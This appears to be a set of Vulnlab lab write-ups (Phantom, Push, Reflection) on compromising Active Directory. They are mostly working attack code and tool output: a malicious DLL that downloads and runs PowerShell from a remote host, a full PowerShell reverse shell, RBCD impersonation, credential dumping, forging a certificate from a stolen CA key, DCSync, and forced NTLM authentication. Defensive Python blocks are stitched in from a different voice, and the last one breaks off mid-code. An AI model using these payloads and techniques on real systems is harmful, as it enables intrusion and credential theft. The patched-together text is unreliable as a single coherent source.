LDAP        dc.phantom.vl   389    DC               [+] phantom.vl\crose:Summer2024 
MAQ         dc.phantom.vl   389    DC               [*] Getting the MachineAccountQuota
MAQ         dc.phantom.vl   389    DC               MachineAccountQuota: 0

Let’s delegate

impacket-rbcd -delegate-from 'crose' -delegate-to 'DC$' -dc-ip '10.10.123.229' -action 'write' 'phantom.vl'/'crose':'Summer2024'        
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Attribute msDS-AllowedToActOnBehalfOfOtherIdentity is empty
[*] Delegation rights modified successfully!
[*] crose can now impersonate users on DC$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     crose        (S-1-5-21-4029599044-1972224926-2225194048-1126)

export KRB5CCNAME=crose.ccache

over-pass-the-hash

impacket-getTGT -hashes :$(pypykatz crypto nt 'Summer2024') 'phantom.vl'/'crose'      
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Saving ticket in crose.ccache

export KRB5CCNAME=crose.ccache
python3 describeTicket.py crose.ccache | grep 'Ticket Session Key'
[*] Ticket Session Key            : 250eee68243a68044b984d8c79a35883
impacket-smbpasswd -newhashes :250eee68243a68044b984d8c79a35883 phantom.vl/crose:'Summer2024'@dc.phantom.vl 
 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

===============================================================================
  Warning: This functionality will be deprecated in the next Impacket version  
===============================================================================

[*] NTLM hashes were changed successfully.
impacket-rbcd -delegate-from 'crose' -delegate-to 'DC$' -dc-ip 10.10.123.229 -action 'write' 'phantom.vl'/'crose' -hashes :250eee68243a68044b984d8c79a35883
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Accounts allowed to act on behalf of other identity:
[*]     crose        (S-1-5-21-4029599044-1972224926-2225194048-1126)
[*] crose can already impersonate users on DC$ via S4U2Proxy
[*] Not modifying the delegation rights.
[*] Accounts allowed to act on behalf of other identity:
[*]     crose        (S-1-5-21-4029599044-1972224926-2225194048-1126)

export KRB5CCNAME=crose.ccache

.

impacket-getST -u2u -impersonate Administrator -spn 'cifs/dc.phantom.vl' -k -no-pass phantom.vl/'crose'
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Impersonating Administrator
[*] Requesting S4U2self+U2U
[*] Requesting S4U2Proxy
[*] Saving ticket in Administrator@cifs_dc.phantom.vl@PHANTOM.VL.ccache

export KRB5CCNAME=Administrator@cifs_dc.phantom.vl@PHANTOM.VL.ccache

.

impacket-secretsdump -k dc.phantom.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0xa08cda6a38d423ba98b6f79cf6c7880f
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8b<redacted>5d:::

.

evil-winrm --ip phantom.vl -u 'Administrator' -H '71<redacted>30'

That was fun.

vulnlab-push

vulnlab-push

A hard Windows machine

preparation

create puck.c on kali box

puck.c contains:

#include <windows.h>
#include <stdlib.h>   /* system() */

/* DLL entry point. On process attach it runs the download-and-execute
   PowerShell one-liner and then returns; the other notifications are ignored. */
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
{
    switch (dwReason) {
        case DLL_PROCESS_ATTACH:
            system("powershell IEX ([System.Text.Encoding]::ASCII.GetString((New-Object Net.Webclient).DownloadData('http://192.168.36.116:9000/puckshell.txt')))");
            break;
        case DLL_PROCESS_DETACH:
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
            break;
    }
    return TRUE;
}

create malicious dll

puck@kali:~$ x86_64-w64-mingw32-gcc ./puck.c -shared -o puck.dll
puck@kali:~$ file puck.dll
puck.dll: PE32+ executable (DLL) (console) x86-64, for MS Windows

puckshell.txt contains:

function cleanup {
if ($client.Connected -eq $true) {$client.Close()}
if ($process.ExitCode -ne $null) {$process.Close()}
exit}
# Setup IPADDR (PowerShell comments use '#', not '//')
$address = '192.168.1.136'
# Setup PORT
$port = '443'
$client = New-Object system.net.sockets.tcpclient
$client.connect($address,$port)
$stream = $client.GetStream()
$networkbuffer = New-Object System.Byte[] $client.ReceiveBufferSize
$process = New-Object System.Diagnostics.Process
$process.StartInfo.FileName = 'C:\\windows\\system32\\cmd.exe'
$process.StartInfo.RedirectStandardInput = 1
$process.StartInfo.RedirectStandardOutput = 1
$process.StartInfo.UseShellExecute = 0
$process.Start()
$inputstream = $process.StandardInput
$outputstream = $process.StandardOutput
Start-Sleep 1
$encoding = new-object System.Text.AsciiEncoding
while($outputstream.Peek() -ne -1){$out += $encoding.GetString($outputstream.Read())}
$stream.Write($encoding.GetBytes($out),0,$out.Length)
$out = $null; $done = $false; $testing = 0;
while (-not $done) {
if ($client.Connected -ne $true) {cleanup}
$pos = 0; $i = 1
while (($i -gt 0) -and ($pos -lt $networkbuffer.Length)) {
$read = $stream.Read($networkbuffer,$pos,$networkbuffer.Length - $pos)
$pos+=$read; if ($pos -and ($networkbuffer[0..$($pos-1)] -contains 10)) {break}}
if ($pos -gt 0) {
$string = $encoding.GetString($networkbuffer,0,$pos)
$inputstream.write($string)
start-sleep 1
if ($process.ExitCode -ne $null) {cleanup}
else {
$out = $encoding.GetString($outputstream.Read())
while($outputstream.Peek() -ne -1){
$out += $encoding.GetString($outputstream.Read()); if ($out -eq $string) {$out = ''}}
$stream.Write($encoding.GetBytes($out),0,$out.length)
$out = $null
$string = $null}} else {cleanup}}

on attacker pc run http listener and nc listener

c:\PENTEST>python3 -m http.server 9000
Serving HTTP on :: port 9000 (http://[::]:9000/) ...
::ffff:192.168.36.91 - - [22/Jul/2024 10:49:46] "GET /puckshell.txt HTTP/1.1" 200 -
::ffff:192.168.36.91 - - [22/Jul/2024 10:50:32] "GET /puckshell.txt HTTP/1.1" 200 -
c:\PENTEST>nc64.exe -nlvp 443
listening on [any] 443 ...
connect to [192.168.36.116] from (UNKNOWN) [192.168.36.91] 58868
Microsoft Windows [Version 10.0.22631.3880]
(c) Microsoft Corporation. Alle rechten voorbehouden.

C:\Windows\System32>whoami
fakedomain\hillie

test on windows target with

rundll32.exe C:\Payloads\puck.dll,XYZ

If all tests are successful, we continue to the writeup.

Writeup :

To abuse ClickOnce we follow the article: we need to upload our SelfService.dll.deploy, which will download and execute a reverse shell.

More to come …

With a shell as kelly.hill we find her credentials in her home folder

evil-winrm --ip ms01.push.vl -u 'kelly.hill' -p 'Sh<redacted>!' 
xfreerdp  /u:kelly.hill /p:'Sh<redacted>!' /v:ms01.push.vl /cert:ignore /rfx

Bloodhound Analysis:

bloodhound-python -d push.vl -v --zip -c all -u 'olivia.wood' -p 'DeployTrust07' -ns 10.10.198.149 --dns-tcp

Check Machine Quota

crackmapexec ldap dc01.push.vl -u "Olivia.Wood" -p "DeployTrust07" -M maq

 

RBCD abuse

From BloodHound we see that kelly.hill has First Degree Object Control over MS01: AllExtendedRights and WriteAccountRestrictions. That means we can read all properties of MS01, and WriteAccountRestrictions lets us edit msDS-AllowedToActOnBehalfOfOtherIdentity to set up RBCD (Resource Based Constrained Delegation).

┌──(puck㉿kali)-[~/vulnlab/push]
└─$ impacket-addcomputer -method LDAPS -computer-name 'puckie' -computer-pass 'Summer2024!' -dc-host dc01.push.vl -domain-netbios push.vl 'push.vl/kelly.hill:Sh<redacted>i!'     
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Successfully added machine account puckie$ with password Summer2024!.
                                                                                                                                        
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ impacket-rbcd -delegate-from 'puckie$' -delegate-to 'MS01$' -action 'write' 'push.vl/kelly.hill:Sh<redacted>i!' 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Accounts allowed to act on behalf of other identity:
[*] Delegation rights modified successfully!
[*] puckie$ can now impersonate users on MS01$ via S4U2Proxy
[*] Accounts allowed to act on behalf of other identity:
[*]     puckie$      (S-1-5-21-1451457175-172047642-1427519037-3603)
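Both impacket-rbcd runs in these notes (crose on DC$ in Phantom, puckie$ on MS01$ here) write a security descriptor into msDS-AllowedToActOnBehalfOfOtherIdentity on the target computer object, and the SIDs in its DACL are exactly what a defender should review. The following is an added example, not impacket's code and not part of the writeup: a minimal parser for that self-relative security descriptor (layout per MS-DTYP) that lists the SIDs granted by ACCESS_ALLOWED ACEs, plus a builder used only to construct the sample. The sample SID is the one impacket printed above; the approved set is an assumed allow-list.

```python
import struct

SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACCESS_ALLOWED_ACE_TYPE = 0x00
FULL_CONTROL = 0x000F01FF   # mask impacket-rbcd writes; the KDC only needs an allow ACE to exist


def str_to_sid(text):
    """'S-1-5-21-...' -> binary SID (MS-DTYP 2.4.2.2)."""
    parts = text.split('-')
    if parts[0] != 'S' or len(parts) < 3:
        raise ValueError('not a SID: %r' % text)
    revision, authority = int(parts[1]), int(parts[2])
    subs = [int(p) for p in parts[3:]]
    return (bytes([revision, len(subs)]) + authority.to_bytes(6, 'big')
            + struct.pack('<%dI' % len(subs), *subs))


def sid_to_str(buf, offset):
    """Binary SID at buf[offset] -> 'S-1-5-21-...'."""
    revision, count = buf[offset], buf[offset + 1]
    authority = int.from_bytes(buf[offset + 2:offset + 8], 'big')
    subs = struct.unpack_from('<%dI' % count, buf, offset + 8)
    return 'S-%d-%d%s' % (revision, authority, ''.join('-%d' % s for s in subs))


def build_allowed_to_act(sids):
    """Constructed self-relative SD with one ACCESS_ALLOWED ACE per SID (sample input only)."""
    aces = b''
    for s in sids:
        sid = str_to_sid(s)
        aces += struct.pack('<BBHI', ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid), FULL_CONTROL) + sid
    dacl = struct.pack('<BBHHH', 4, 0, 8 + len(aces), len(sids), 0) + aces   # ACL_REVISION_DS = 4
    owner = str_to_sid('S-1-5-32-544')                                        # BUILTIN Administrators
    header = struct.pack('<BBHIIII', 1, 0, SE_SELF_RELATIVE | SE_DACL_PRESENT,
                         20, 20, 0, 20 + len(owner))    # owner, group, sacl, dacl offsets
    return header + owner + dacl


def parse_allowed_to_act(sd):
    """Return the SIDs granted by ACCESS_ALLOWED ACEs in the attribute's DACL."""
    if len(sd) < 20:
        raise ValueError('security descriptor too short')
    revision, _, control, _, _, _, off_dacl = struct.unpack_from('<BBHIIII', sd, 0)
    if revision != 1:
        raise ValueError('unsupported SD revision %d' % revision)
    if not control & SE_DACL_PRESENT or off_dacl == 0:
        return []                                   # no DACL: nothing is granted here
    _, _, acl_size, ace_count, _ = struct.unpack_from('<BBHHH', sd, off_dacl)
    pos, end = off_dacl + 8, off_dacl + acl_size
    allowed = []
    for _ in range(ace_count):
        if pos + 8 > end:
            raise ValueError('truncated ACE')
        ace_type, _, ace_size, _mask = struct.unpack_from('<BBHI', sd, pos)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            allowed.append(sid_to_str(sd, pos + 8))
        pos += ace_size                              # skip deny/object ACEs by their declared size
    return allowed


def audit_rbcd(sd, approved):
    """SIDs allowed to act on behalf of the computer that are not on the approved list."""
    return [s for s in parse_allowed_to_act(sd) if s not in approved]


if __name__ == '__main__':
    sample = build_allowed_to_act(['S-1-5-21-1451457175-172047642-1427519037-3603'])
    print(audit_rbcd(sample, approved=set()))
```

In practice the bytes come from an LDAP read of msDS-AllowedToActOnBehalfOfOtherIdentity on every computer object; any SID that is not a documented delegation (and any freshly created machine or user account, as both cases above are) is the alert. Resolving the SIDs back to names and alerting on writes to the attribute (directory service object modification auditing) closes the loop.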
                                                                                                                                        
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ impacket-getST -spn 'cifs/ms01.push.vl' -impersonate 'administrator' 'push.vl/puckie$:Summer2024!'  
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[-] CCache file is not found. Skipping...
[*] Getting TGT for user
[*] Impersonating administrator
[*] Requesting S4U2self
[*] Requesting S4U2Proxy
[*] Saving ticket in administrator@cifs_ms01.push.vl@PUSH.VL.ccache
                                                                                                                                        
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ export KRB5CCNAME=administrator@cifs_ms01.push.vl@PUSH.VL.ccache            

                                                                                                                                        
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ impacket-secretsdump -k ms01.push.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x1a2f736cde34f0733b3cc6f7ec68c413
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:d8<redacted>61:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:d7da45674bae3a0476c0f64b67121f7d:::
[*] Dumping cached domain logon information (domain/username:hash)
PUSH.VL/Administrator:$DCC2$10240#Administrator#33<redacted>09: (2023-08-31 18:27:31)
PUSH.VL/Kelly.Hill:$DCC2$10240#Kelly.Hill#b0<redacted>29: (2023-09-02 11:17:04)
PUSH.VL/sccadmin:$DCC2$10240#sccadmin#0c<redacted>5c: (2023-08-31 10:26:08)

Now that we have the Administrator hash of ms01

┌──(puck㉿kali)-[~/vulnlab/push]
└─$ evil-winrm --ip ms01.push.vl -u 'Administrator' -H 'd8<redacted>61'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ..
*Evil-WinRM* PS C:\Users\kelly.hill\documents> dir


    Directory: C:\Users\kelly.hill\documents


Mode                 LastWriteTime         Length Name
----                 -------------         ------ ----
-a----         7/25/2024   7:39 AM        1125376 SharpSCCM.exe


*Evil-WinRM* PS C:\Users\kelly.hill\documents> .\SharpSCCM.exe local site-info

  _______ _     _ _______  ______  _____  _______ _______ _______ _______
  |______ |_____| |_____| |_____/ |_____] |______ |       |       |  |  |
  ______| |     | |     | |    \_ |       ______| |______ |______ |  |  |    @_Mayyhem

[+] Connecting to \\127.0.0.1\root\CCM
[+] Executing WQL query: SELECT Name,CurrentManagementPoint FROM SMS_Authority
-----------------------------------
SMS_Authority
-----------------------------------
CurrentManagementPoint: DC01.push.vl
Name: SMS:HQ0
-----------------------------------
[+] Completed execution in 00:00:00.2090991
*Evil-WinRM* PS C:\Users\kelly.hill\documents> 


.

┌──(sccmhunter)─(puck㉿kali)-[~/vulnlab/push/sccmhunter]
└─$ python3 sccmhunter.py find -u 'sccadmin' -p '7u<redacted>JM' -dc-ip 10.10.188.181 -d push.vl -ldaps 
SCCMHunter v1.0.5 by @garrfoster
[10:15:22] INFO     [*] Checking for System Management Container.                                                    
[10:15:22] INFO     [+] Found System Management Container. Parsing DACL.                                             
[10:15:22] INFO     [-] System Management Container not found.                                                       
[10:15:22] INFO     [*] Searching LDAP for anything containing the strings 'SCCM' or 'MECM'                          
[10:15:23] INFO     [-] No results found.                                                                            
                                                                                                                     
┌──(sccmhunter)─(puck㉿kali)-[~/vulnlab/push/sccmhunter]
└─$ python3 sccmhunter.py smb -u 'sccadmin' -p '7u<redacted>JM' -dc-ip 10.10.188.181 -d push.vl -ldaps 
SCCMHunter v1.0.5 by @garrfoster
[10:17:30] INFO     [-] No SiteServers found in database.                                                            
[10:17:30] INFO     [-] No Management Points found in database.                                                      
[10:17:30] INFO     [-] No computers found in database.

I could not solve the sccadmin exploit.

It should run like below, giving the hash in Responder

PS C:\Users\kelly.hill\Documents> .\SharpSCCM.exe invoke client-push -t 10.8.2.138 -mp DC01.push.vl -sc HQ0
.\SharpSCCM.exe invoke client-push -t 10.8.2.138 -mp DC01.push.vl -sc HQ0

  _______ _     _ _______  ______  _____  _______ _______ _______ _______
  |______ |_____| |_____| |_____/ |_____] |______ |       |       |  |  |
  ______| |     | |     | |    \_ |       ______| |______ |______ |  |  |    @_Mayyhem

[+] Created "ConfigMgr Client Messaging" certificate in memory for device registration and signing/encrypting subsequent messages
[+] Reusable Base64-encoded certificate:

    308209D20201033082098E06092A864886F70D010701A082097F0482097B308209773082059006092A864886F70D010701A00207D0

[+] Discovering local properties for client registration request
[+] Modifying client registration request properties:
      FQDN: 10.8.2.138
      NetBIOS name: 10.8.2.138
      Site code: HQ0
[+] Sending HTTP registration request to DC01.push.vl:80
[+] Received unique SMS client GUID for new device:

    GUID:7D070746-617E-4763-9835-F7811A6BED54

[+] Discovering local properties for DDR inventory report
[+] Modifying DDR and inventory report properties
[+] Discovered PlatformID: Microsoft Windows NT Advanced Server 10.0
[+] Modified PlatformID: Microsoft Windows NT Workstation 2010.0
[+] Sending DDR from GUID:7D070746-617E-4763-9835-F7811A6BED54 to MP_DdrEndpoint endpoint on DC01.push.vl:HQ0 and requesting client installation on 10.8.0.233
[+] Completed execution in 00:00:06.9340974

.

As we now have the password of user sccadmin, we do a Golden Ticket attack

┌──(puck㉿kali)-[~/vulnlab/push]
└─$ crackmapexec smb dc01.push.vl -u "sccadmin" -p "7u<redacted>JM"          
SMB         DC01.push.vl    445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:push.vl) (signing:True) (SMBv1:False)
SMB         DC01.push.vl    445    DC01             [+] push.vl\sccadmin:7u<redacted>JM 

A Golden Certificate attack with certipy-ad and passthecert is possible because we have SYSTEM access to MS01 (which is the CA)

┌──(puck㉿kali)-[~/vulnlab/push]
└─$ certipy-ad ca -u sccadmin -p '7u<redacted>JM' -target-ip MS01.push.vl -backup
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Creating new service
[*] Creating backup
[*] Retrieving backup
[*] Got certificate and private key
[*] Saved certificate and private key to 'CA.pfx'
[*] Cleaning up
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ certipy-ad forge -ca-pfx CA.pfx -upn administrator@push.vl -subject 'CN=Administrator,CN=Users,DC=PUSH,DC=VL'
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Saved forged certificate and private key to 'administrator_forged.pfx'
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ certipy-ad cert -pfx administrator_forged.pfx -nokey -out administrator.crt
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Writing certificate and  to 'administrator.crt'
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ certipy-ad cert -pfx administrator_forged.pfx -nocert -out administrator.key
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Writing private key to 'administrator.key'
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ python3 passthecert.py -action modify_user -crt administrator.crt -key administrator.key -target kelly.hill -elevate -domain push.vl -dc-host dc01.push.vl
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Granted user 'kelly.hill' DCSYNC rights!
┌──(puck㉿kali)-[~/vulnlab/push]
└─$ impacket-secretsdump kelly.hill@DC01.push.vl 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

Password:
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0d<redacted>0f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:d9fd5a3d1406ca03668fcd04a0b4eb09:::
push.vl\svcsql:1104:aad3b435b51404eeaad3b435b51404ee:19<redacted>85:::

That was fun 🙂

.

references used

sccm

PassTheCert

sharpcollection

 

.

 

vulnlab-reflection

vulnlab-reflection

Reflection is a medium Active Directory chain consisting of three machines: MS01, WS01 and DC01. On MS01, MSSQL staging credentials are found on an SMB share; these lead to relaying the NTLM hash to DC01's SMB shares, where the service account has access to the prod share containing credentials for the production database. From there we get two domain credentials. abbie.smith has GenericAll on MS01, through which we can read the LAPS password and then dump Georgia.Price's password from the credential vault. That user also has GenericAll on WS01; having full access on MS01, we can perform Resource Based Constrained Delegation (RBCD). Dumping again gives us Rhys.Garner's password, which can be reused on DOM_RGARNER, a member of Domain Admins.

Writeup:

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ crackmapexec smb ms01.reflection.vl -u 'puck' -p '' --shares

SMB         ms01.reflection.vl 445    MS01             [*] Windows Server 2022 Build 20348 x64 (name:MS01) (domain:reflection.vl) (signing:False) (SMBv1:False)
SMB         ms01.reflection.vl 445    MS01             [+] reflection.vl\puck: 
SMB         ms01.reflection.vl 445    MS01             [+] Enumerated shares
SMB         ms01.reflection.vl 445    MS01             Share           Permissions     Remark
SMB         ms01.reflection.vl 445    MS01             -----           -----------     ------
SMB         ms01.reflection.vl 445    MS01             ADMIN$                          Remote Admin
SMB         ms01.reflection.vl 445    MS01             C$                              Default share
SMB         ms01.reflection.vl 445    MS01             IPC$            READ            Remote IPC
SMB         ms01.reflection.vl 445    MS01             staging         READ            staging environment
                                                                                              
┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ smbclient //ms01.reflection.vl/staging      

Password for [WORKGROUP\puck]:
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jun  7 19:42:48 2023
  ..                                  D        0  Wed Jun  7 19:41:25 2023
  staging_db.conf                     A       50  Thu Jun  8 13:21:49 2023

        6261245 blocks of size 4096. 1153753 blocks available
smb: \> cat staging_db.conf
cat: command not found
smb: \> get staging_db.conf
getting file \staging_db.conf of size 50 as staging_db.conf (0.6 KiloBytes/sec) (average 0.6 KiloBytes/sec)
smb: \> 

---

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ cat staging_db.conf 
user=web_staging
password=Washroom510
db=staging   

MSSQL enumeration with the staging credentials:

┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-mssqlclient web_staging:Washroom510@ms01.reflection.vl 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(MS01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(MS01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (web_staging  guest@master)> enum_users
UserName             RoleName   LoginName   DefDBName   DefSchemaName       UserID     SID   
------------------   --------   ---------   ---------   -------------   ----------   -----   
dbo                  db_owner   sa          master      dbo             b'1         '   b'01'   

guest                public     NULL        NULL        guest           b'2         '   b'00'   

INFORMATION_SCHEMA   public     NULL        NULL        NULL            b'3         '    NULL   

sys                  public     NULL        NULL        NULL            b'4         '    NULL   

SQL (web_staging  guest@master)> enum_db
name      is_trustworthy_on   
-------   -----------------   
master                    0   

tempdb                    0   

model                     0   

msdb                      1   

staging                   0   

SQL (web_staging  guest@master)> use staging;
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: staging
[*] INFO(MS01\SQLEXPRESS): Line 1: Changed database context to 'staging'.
SQL (web_staging  dbo@staging)>
SQL (web_staging  dbo@staging)> select * from staging.information_schema.tables where table_type=' BASE TABLE'
TABLE_CATALOG   TABLE_SCHEMA   TABLE_NAME   TABLE_TYPE   
-------------   ------------   ----------   ----------   
SQL (web_staging  dbo@staging)> select * from staging.information_schema.tables;
TABLE_CATALOG   TABLE_SCHEMA   TABLE_NAME   TABLE_TYPE   
-------------   ------------   ----------   ----------   
staging         dbo            users        b'BASE TABLE'   

SQL (web_staging  dbo@staging)> select * from users;
id   username   password        
--   --------   -------------   
 1   b'dev01'   b'Initial123'   

 2   b'dev02'   b'Initial123'   

SQL (web_staging  dbo@staging)> 

SQL (web_staging  dbo@staging)> exec xp_dirtree '\\10.8.2.138\share',1,1;
subdirectory   depth   file   
------------   -----   ----   
SQL (web_staging  dbo@staging)> 

The NetNTLMv2 hash captured below does not crack with rockyou:

john svc_web_staging.hash --wordlist=/usr/share/wordlists/rockyou.txt

Start an SMB server to catch the authentication that xp_dirtree forces from the SQL service account:
┌──(puck㉿kali)-[~/vulnlab/reflection]
└─$ impacket-smbserver -smb2support share . 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra

[*] Config file parsed
[*] Callback added for UUID 4B324FC8-1670-01D3-1278-5A47BF6EE188 V:3.0
[*] Callback added for UUID 6BFFD098-A112-3610-9833-46C3F87E345A V:1.0
[*] Config file parsed
[*] Config file parsed
[*] Config file parsed
[*] Incoming connection (10.10.203.134,51852)
[*] AUTHENTICATE_MESSAGE (REFLECTION\svc_web_staging,MS01)
[*] User MS01\svc_web_staging authenticated successfully
[*] svc_web_staging::REFLECTION:aaaaaaaaaaaaaaaa:9860ed689f9394465837459e3b9ca171:01010000000000008009d71aedd8da0162c1605a968cd3de0000000001001000440075004800720044004e0043006e0003001000440075004800720044004e0043006e000200100072004b004300650052005000510056000400100072004b00430065005200500051005600070008008009d71aedd8da01060004000200000008003000300000000000000000000000003000006e4f54e6fef72023740b6b479ac0125f4ea3738055309f9f716c05e474303f3d0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e0038002e0032002e003100330038000000000000000000
[*] Closing down connection (10.10.203.134,51852)
[*] Remaining connections []
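Before relaying it, it is worth seeing what the captured NetNTLMv2 response actually carries. The following is an added example (my own code, not impacket's) that parses the line impacket-smbserver printed above: the NTLMv2_CLIENT_CHALLENGE header and the AV_PAIR list from MS-NLMP. The target SPN the client believed it was talking to (cifs/10.8.2.138, i.e. the UNC we coerced), the all-zero channel bindings and the fixed server challenge are what a relay operator, or a defender triaging a capture, looks at. The AV_PAIR names and layout are from the specification; the line itself is copied from this writeup as the sample input.

```python
import struct
from datetime import datetime, timedelta, timezone

# Sample input for this example: the NetNTLMv2 line impacket-smbserver printed above,
# copied from this writeup. Format: user::DOMAIN:server_challenge:NTProofStr:blob
CAPTURED = (
    "svc_web_staging::REFLECTION:aaaaaaaaaaaaaaaa:9860ed689f9394465837459e3b9ca171:"
    "01010000000000008009d71aedd8da0162c1605a968cd3de0000000001001000440075004800720044004e0043006e0003001000440075004800720044004e0043006e000200100072004b004300650052005000510056000400100072004b00430065005200500051005600070008008009d71aedd8da01060004000200000008003000300000000000000000000000003000006e4f54e6fef72023740b6b479ac0125f4ea3738055309f9f716c05e474303f3d0a0010000000000000000000000000000000000009001e0063006900660073002f00310030002e0038002e0032002e003100330038000000000000000000"
)

# AV_PAIR ids from MS-NLMP 2.2.2.1
AV_NAMES = {
    0x0001: "MsvAvNbComputerName", 0x0002: "MsvAvNbDomainName",
    0x0003: "MsvAvDnsComputerName", 0x0004: "MsvAvDnsDomainName",
    0x0005: "MsvAvDnsTreeName", 0x0006: "MsvAvFlags", 0x0007: "MsvAvTimestamp",
    0x0008: "MsvAvSingleHost", 0x0009: "MsvAvTargetName", 0x000A: "MsvAvChannelBindings",
}


def filetime_to_datetime(ft: int) -> datetime:
    """Windows FILETIME (100 ns ticks since 1601-01-01 UTC) to an aware datetime."""
    return datetime(1601, 1, 1, tzinfo=timezone.utc) + timedelta(microseconds=ft // 10)


def parse_av_pairs(buf: bytes, pos: int) -> dict:
    """Walk the AV_PAIR list (AvId, AvLen, Value) until MsvAvEOL."""
    av = {}
    while True:
        av_id, av_len = struct.unpack_from("<HH", buf, pos)
        value = buf[pos + 4:pos + 4 + av_len]
        pos += 4 + av_len
        if av_id == 0x0000:                       # MsvAvEOL
            return av
        name = AV_NAMES.get(av_id, "MsvAv%04x" % av_id)
        if av_id in (1, 2, 3, 4, 5, 9):           # UTF-16LE strings
            av[name] = value.decode("utf-16-le")
        elif av_id == 6:                          # MsvAvFlags, bit 0x2 = MIC present
            av[name] = struct.unpack("<I", value)[0]
        elif av_id == 7:                          # MsvAvTimestamp, FILETIME
            av[name] = filetime_to_datetime(struct.unpack("<Q", value)[0])
        else:                                     # SingleHost, ChannelBindings: keep as hex
            av[name] = value.hex()


def parse_ntlmv2_response(line: str) -> dict:
    """Split a hashcat/john-style NetNTLMv2 line and decode the response blob."""
    user, _, domain, server_challenge, ntproofstr, blob_hex = line.split(":", 5)
    blob = bytes.fromhex(blob_hex)
    # NTLMv2_CLIENT_CHALLENGE: RespType, HiRespType, Reserved1, Reserved2,
    # TimeStamp, ChallengeFromClient, Reserved3 (28 bytes), then the AV_PAIR list
    resp_type, hi_resp_type, _, _, ts, client_challenge, _ = struct.unpack_from("<BBHIQ8sI", blob, 0)
    if (resp_type, hi_resp_type) != (1, 1):
        raise ValueError("not an NTLMv2 response blob")
    return {
        "user": user, "domain": domain,
        "server_challenge": server_challenge, "ntproofstr": ntproofstr,
        "timestamp": filetime_to_datetime(ts),
        "client_challenge": client_challenge.hex(),
        "av_pairs": parse_av_pairs(blob, 28),
    }


def relay_indicators(parsed: dict) -> dict:
    """Fields that decide whether, and where, this authentication can be relayed."""
    av = parsed["av_pairs"]
    return {
        # SPN the client believes it contacted: cifs/<our IP>, taken from the coerced UNC.
        # Plain SMB targets do not validate it, which is why relaying to DC01 works.
        "target_spn": av.get("MsvAvTargetName"),
        # All-zero bindings: there was no TLS channel to bind to (plain SMB).
        # A target enforcing EPA (e.g. LDAPS with channel binding) would reject this.
        "channel_bindings_zero": av.get("MsvAvChannelBindings") == "00" * 16,
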